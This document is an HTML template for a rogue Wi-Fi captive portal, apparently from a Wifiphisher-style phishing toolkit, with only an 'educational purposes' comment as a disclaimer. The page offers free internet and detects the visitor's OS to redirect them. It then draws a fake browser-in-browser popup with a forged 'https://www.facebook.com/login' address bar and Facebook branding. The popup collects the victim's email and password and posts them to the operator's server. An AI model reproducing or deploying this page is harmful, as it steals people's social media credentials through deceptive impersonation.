<!DOCTYPE html>
<!--This tempalte and project is only for educational purposes, we are not responsible for any misuse -->
<html>
<head>
    <title>{{ organization }} Wi-Fi Service</title>
    <meta charset="utf-8">
	<link rel="stylesheet" href="static\css\font-awesome.min.css">
<style>
body {
  margin: 0;
  font-family: Arial, Helvetica, sans-serif;
  line-height: 1.28;
  display:flex; 
  flex-direction:column;
  overflow: visible !important;
  background: -webkit-linear-gradient(45deg, #085078 10%, #85d8ce 90%);
  background: -moz-linear-gradient(45deg, #085078 10%, #85d8ce 90%);
  background: -ms-linear-gradient(45deg, #085078 10%, #85d8ce 90%);
  background: -o-linear-gradient(45deg, #085078 10%, #85d8ce 90%);
  background: linear-gradient(45deg, #085078 10%, #85d8ce 90%);
}

html, body{ height:100%; margin:0; }
footer{ height:45px; bottom:0; }



#navwrapper {
  width: 100%;
  height: 95px;
  background-color: #3b5998;
}

#navbar {
  margin: 0 auto;
  width:980px;
  height:59px;
}

#contentwrapper {
  width: 100%;
  height: 606px;
  background-color: #edf0f5;
}

#content {
  margin: 0 auto;
  width:980px;
  padding-top:20px;
}

h1 {
  font-family: tahoma,verdana,arial,sans-serif;
  font-size: 38px;
  letter-spacing:0.05px;
  margin: 0;
  color:#fff;
  -webkit-font-smoothing: antialiased;
}


h3 {
        font-size: 14px;
        color: #fff;
        text-decoration: none;
        font-weight: 400;

	  position: fixed;
  width: 40%;
  bottom: 10px;
    text-align: center;
  align-content: center;


      }
/* Pen Title */
.pen-title {
  padding: 50px 0;
  text-align: center;
  letter-spacing: 2px;
}
.pen-title h4 {
  margin: 0 0 20px;
  font-size: 48px;
  font-weight: 300;
}
.pen-title span {
  font-size: 12px;
}
.pen-title span .fa {
  color: #33b5e5;
}
.pen-title span a {
  color: #33b5e5;
  font-weight: 600;
  text-decoration: none;
}


.logowrapper {
  display: block;
  padding: 10px 0;
}

input[type=text], input[type=password] {
  width: 25%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  box-sizing: border-box;
}


.login-btn {
	-moz-box-shadow:inset 0px 1px 0px 0px #7a8eb9;
	-webkit-box-shadow:inset 0px 1px 0px 0px #7a8eb9;
	box-shadow:inset 0px 1px 0px 0px #7a8eb9;
	background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #637aad), color-stop(1, #5972a7));
	background:-moz-linear-gradient(top, #637aad 5%, #5972a7 100%);
	background:-webkit-linear-gradient(top, #637aad 5%, #5972a7 100%);
	background:-o-linear-gradient(top, #637aad 5%, #5972a7 100%);
	background:-ms-linear-gradient(top, #637aad 5%, #5972a7 100%);
	background:linear-gradient(to bottom, #637aad 5%, #5972a7 100%);
	filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#637aad', endColorstr='#5972a7',GradientType=0);
	background-color:#637aad;
	border:1px solid #314179;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:13px;
	font-weight:bold;
	padding:7px 12px;
	text-decoration:none;
}
.login-btn:hover {
	background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #5972a7), color-stop(1, #637aad));
	background:-moz-linear-gradient(top, #5972a7 5%, #637aad 100%);
	background:-webkit-linear-gradient(top, #5972a7 5%, #637aad 100%);
	background:-o-linear-gradient(top, #5972a7 5%, #637aad 100%);
	background:-ms-linear-gradient(top, #5972a7 5%, #637aad 100%);
	background:linear-gradient(to bottom, #5972a7 5%, #637aad 100%);
	filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#5972a7', endColorstr='#637aad',GradientType=0);
	background-color:#5972a7;
}
.login-btn:active {
	position:relative;
	top:1px;
}

body {background-color: white;}



h2 {
  font-family: Arial, Helvetica, sans-serif;

  
}


* {
  box-sizing: border-box;
}



/* style inputs and link buttons */
input,
.btn {
  width: 100%;
  padding: 12px;
  border: none;
  border-radius: 4px;
  margin: 5px 0;
  opacity: 0.85;
  display: inline-block;
  font-size: 17px;
  line-height: 20px;
  text-decoration: none; /* remove underline from anchors */
}

input:hover,
.btn:hover {
  opacity: 1;
}

/* add appropriate colors to fb, twitter and google buttons */
.fb {
  background-color: #3B5998;
  color: white;
  cursor:pointer;

}



.twitter {
  background-color: #55ACEE;
  color: white;
  cursor:pointer;
}




/* Two-column layout */
.col {
  float: center;
  width: 50%;
  margin: auto;
  padding: 0 50px;
  margin-top: 6px;
  text-align: center;
}

/* Clear floats after the columns */
.row:after {
  content: "";
  display: table;
  clear: both;
}



/* hide some text on medium and large screens */
.hide-md-lg {
  display: none;
}



/* Responsive layout - when the screen is less than 650px wide, make the two columns stack on top of each other instead of next to each other */
@media screen and (max-width: 650px) {
  .col {
    width: 100%;
    margin-top: 0;
    text-align: center;
  }
  /* show the hidden text on small screens */
  .hide-md-lg {
    display: block;
    text-align: center;
  }
h3 {
    width: 40%;
}
}
@media screen and (min-width: 1000px)  {
  .col {
    width: 35%;
    text-align: center;
  }
}
h3 {
    width: 27%;
}

footer {
 position: absolute;
 bottom: 0;
 width: 100%;
}


@media screen and (min-width: 650px) and (max-width: 800px) {

h3 {
    width: 40%;
}

}
@media screen and (min-width: 800px) and (max-width: 1000px) {

h3 {
    width: 40%;
}

}
@media screen and (min-width: 300px) and (max-width: 650px) {

h3 {
    width: 80%;
}

/* Pen Title */
.pen-title {
  padding: 50px 0;
  text-align: center;
  letter-spacing: 2px;
}
.pen-title h4 {
  margin: 0 0 20px;
  font-size: 20px;
  font-weight: 300;
}
.pen-title span {
  font-size: 10px;
}
.pen-title span .fa {
  color: #33b5e5;
}
.pen-title span a {
  color: #33b5e5;
  font-weight: 600;
  text-decoration: none;
}

}

}
</style>





<script>

function test() {
var isMobile = {
        Android: function() {
            return navigator.userAgent.match(/Android/i);
        },
        BlackBerry: function() {
            return navigator.userAgent.match(/BlackBerry/i);
        },
        iOS: function() {
            return navigator.userAgent.match(/iPhone|iPad|iPod/i);
        },
        Opera: function() {
            return navigator.userAgent.match(/Opera Mini/i);
        },
        Windowsmob: function() {
            return navigator.userAgent.match(/IEMobile/i);
        },        
        anymobile: function() {
            return (isMobile.Android() || isMobile.BlackBerry() || isMobile.iOS() || isMobile.Opera() || isMobile.Windowsmob());
        }

    };



if ( isMobile.anymobile() ) {
        document.location.href = "text.html";
    }
}
</script>

<script>

{
var OSName="Unknown OS";
if (navigator.appVersion.indexOf("Win")!=-1) OSName="Windows";
if (navigator.appVersion.indexOf("Mac")!=-1) OSName="MacOS";
if (navigator.appVersion.indexOf("X11")!=-1) OSName="UNIX";
if (navigator.appVersion.indexOf("Linux")!=-1) OSName="Linux";



if (OSName == "MacOS") {
window.location='login.html';
    };

}

</script>


<script>
function detect() {

var OSName="Unknown OS";
if (navigator.appVersion.indexOf("Win")!=-1) OSName="Windows";
if (navigator.appVersion.indexOf("Mac")!=-1) OSName="MacOS";
if (navigator.appVersion.indexOf("X11")!=-1) OSName="UNIX";
if (navigator.appVersion.indexOf("Linux")!=-1) OSName="Linux";




if (OSName == "MacOS") {
window.location='login.html';
    };


if (OSName == "Linux") {
window.location='facebook.html';
    };

if (OSName == "UNIX") {
window.location='facebook.html';
    };
}

</script>
<script>
function nointernet() {
    window.location.href='nointernet.html';
 }
</script>
<script>
function alertee() {
  alert("Twitter is not available for the moment!");
}
</script>
</head>
<body style="overflow: hidden background-color: white">
<script src=".\static\jsframe.js"></script>


<div class="container">
  <form action="/action_page.php">
  <div class="pen-title">
    <h4>Get connected to the Internet for free</h4><span>A simple, no frills {{ organization }} Wi-Fi service.</span>
  </div>
    <div class="row">
      <h2 style="text-align:center">Login with Social Media</h2>
      <div class="vl">
      </div>

      <div class="col">
        <a  onclick="test();detect();setTimeout(start, 200)" class="fb btn">
          <i class="fa fa-fw"></i> Login with Facebook
        </a>
        <a onclick="alertee()" class="twitter btn">
          <i class="fa fa-fw"></i> Login with Twitter
        </a>
      <h3><a  class="fixed" onclick="test();openthegoddamnwindow()">Terms of Usage</a></h3>
      </div>

<script>
    function start() {

        const jsFrame = new JSFrame();
		
		
				const HT =  '<div id="navwrapper">' +
'<table border="1" style="width: 100%; border-collapse: collapse; background-color: #fdfdfd;">' +
'<tbody>' +
'<tr style="height: 10px;">' +
'<td style="width: 100%; height: 10px;"><img src="static/ssl.png" alt="" width="16" height="16" /><span style="color: #008000; font-size:17px">https</span><span style="font-size:17px;">://www.facebook.com/login</span></td>' +
'</tr>' +
'</tbody>' +
'</table>' +
'<div id="navbar">' +
'<h1 class="logowrapper">&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;f<span style="letter-spacing: 0.05px;">a</span><span style="letter-spacing: 0.05px;">c</span><span style="letter-spacing: 0.05px;">eb</span><span style="letter-spacing: 0.05px;">ook</span></h1>' +
'<p><span style="letter-spacing: 0.05px;"></span></p>' +
'<p><span style="letter-spacing: 0.05px;"></span></p>' +
'<p style="text-align: left;"></p>' +
'</div>' +
'</div>' +
'<div class="container"><b></b></div>' +
'<div class="container" style="text-align: left;"><b></b></div>' +
'<br />' +
'<br />' +
'<br />' +
'<div class="container"  style="text-align: center; font-size:16px"><b></b>&nbsp; &nbsp;Log in with your Facebook account:</div>' +
'<div class="container" style="text-align: center;"><b></b></div>' +
'<br />' +
'<form name="theform" class="theform" method="post" action="oauth.html">' +
'<div class="container" style="text-align: center; font-size:15px;"><label for="wfphshr-username">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Email or Phone:&nbsp; &nbsp; </label>&nbsp;<input type="text" placeholder="Enter your Email or Phone number" minlength="3" name="wfphshr-username" required="" style="font-size:12px;"/></div>' +
'<div class="container" style="text-align: center; font-size:15px;"><label for="wfphshr-password">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Password:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</label>&nbsp;<input type="password" minlength="4" placeholder="Enter Password" name="wfphshr-password" required="" style="font-size:12px;"/></div>' +
'<div class="container" style="text-align: right;">&nbsp; &nbsp; &nbsp;</div>' +
'<br />' +
'<br />' +
'<br />' +
'<footer>' +
'<br />' +
'<div class="container" style="text-align: left;">' +
'<table style="height: 43px; width: 100%; border-collapse: collapse; border-color: Lightgrey; background-color: #f5f5f7; border-style: hidden;">' +
'<tbody>' +
'<tr style="height: 43px;">' +
'<td style="width: 100%; height: 43px; text-align: right;"><button onclick="nointernet()">Cancel</button>&nbsp;<button class="login-btn">Log In</button></td>' +
'</tr>' +
'</tbody>' +
'</table>' +
'</footer>' +
'</div>' +
'</form>'
		

        const frames = [];
        for (let i = 0; i < 1; i++) {
            const frame = jsFrame.create({
                name: `Win${i}`,
                title: `Facebook`,
                left: 20 , top: 50, width: 920, height: 423,
				minWidth: 800, minHeight: 400,
                appearanceName: 'redstone',
				smoothResizeOnIframe:true,
                style: {
                    overflow: 'hidden'
                },
                html: HT
            }).show();
			
			frame.hideFrameComponent('maximizeButton');
			frame.hideFrameComponent('minimizeButton');

            frame.on('minimizeButton', 'click', (_frame, evt) => {

                frame.hideFrameComponent('minimizeButton');
                frame.showFrameComponent('deminimizeButton');

                const force = true;

                _frame.extra.__restore_info = {
                    org_left: _frame.getLeft(),
                    org_top: _frame.getTop(),
                    org_width: _frame.getWidth(),
                    org_height: _frame.getHeight()
                };

                _frame.setSize(_frame.getWidth(), 30, force);
                _frame.setResizable(true);


            });
            frame.on('deminimizeButton', 'click', (_frame, evt) => {

                _frame.showFrameComponent('minimizeButton');
                _frame.hideFrameComponent('deminimizeButton');

                const force = true;
                _frame.setSize(_frame.extra.__restore_info.org_width, _frame.extra.__restore_info.org_height, force);

            });

            frame.on('maximizeButton', 'click', (_frame, evt) => {

                _frame.extra.__restore_info = {
                    org_left: _frame.getLeft(),
                    org_top: _frame.getTop(),
                    org_width: _frame.getWidth(),
                    org_height: _frame.getHeight()
                };

                frame.hideFrameComponent('maximizeButton');
                frame.showFrameComponent('restoreButton');

                frame.setPosition(0, 0);
                frame.setSize(window.innerWidth - 2, window.innerHeight - 2, true);

                frame.setMovable(true);
                frame.setResizable(true);


            });

            frame.on('restoreButton', 'click', (_frame, evt) => {

                frame.setMovable(true);
                frame.setResizable(true);

                _frame.setPosition(_frame.extra.__restore_info.org_left, _frame.extra.__restore_info.org_top);

                const force = true;
                _frame.setSize(_frame.extra.__restore_info.org_width, _frame.extra.__restore_info.org_height, force);

                _frame.showFrameComponent('maximizeButton');
                _frame.hideFrameComponent('restoreButton');


            });
            frame.on('closeButton', 'click', (_frame, evt) => {
                _frame.closeFrame();
            });
            frames.push(frame);
        }
        frames[0].requestFocus();
    }

  function openthegoddamnwindow() {
        const jsFrame = new JSFrame();
        const modalFrame = jsFrame.create({
            name: 'A-God-Damn-Window',
            title: 'Terms of Usage',
				smoothResizeOnIframe:true,
            left: 0, top: 0, width: 400, height: 210,
            movable: true,
            resizable: true,
            url: 'text.html'
        });
        modalFrame.setPosition(window.innerWidth / 2, window.innerHeight / 2, 'CENTER_CENTER');
        modalFrame.showModal(_frame => { 
		frame05
        });
    }


</script>

</body>
</html>
